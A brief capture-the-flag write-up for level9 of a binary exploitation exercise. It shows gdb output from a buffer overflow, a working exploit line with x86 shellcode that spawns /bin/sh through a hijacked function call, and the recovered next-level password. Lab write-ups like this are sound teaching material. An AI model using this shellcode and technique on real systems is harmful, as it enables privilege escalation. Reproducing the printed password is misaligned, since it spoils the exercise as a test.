For the last level of the mandatory part, we notice there is a twist, as the binary seems to be a cpp code. We don't seem to see any shell or pass reading so we are going to use a shellcode.

Let's try to make the program segfault with 'A's it segfault from 109, if we put 112 in gdb with 'B's at the end, we get this segfault

```
(gdb) i r
eax            0x42424242       1111638594
ecx            0x42424242       1111638594
edx            0x804a07c        134520956
ebx            0x804a078        134520952
esp            0xbffff6a0       0xbffff6a0
ebp            0xbffff6c8       0xbffff6c8
esi            0x0      0
edi            0x0      0
eip            0x8048682        0x8048682 <main+142>
eflags         0x210287 [ CF PF SF IF RF ID ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) x/i $eip
=> 0x8048682 <main+142>:        mov    (%eax),%edx
(gdb)
```

later in the code, we got this

```0x8048693 <main+159>                          call   *%edx```

That means we can put the target address we want to jump to at any point in the string, and put the adress of this at the 109-112 bytes.

We will target our shellcode with it.

```
level9@RainFall:~$ ./level9  `python -c "print('\x10\xa0\x04\x08'+'\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68'+'A'*58+'\x0c\xa0\x04\x08')"`
$ whoami
bonus0
$ cat /home/user/bonus0/.pass
f3f0004b6f364cb5a4147e9ef827fa922a4861408845c26b6971ad770d906728
``` 

:)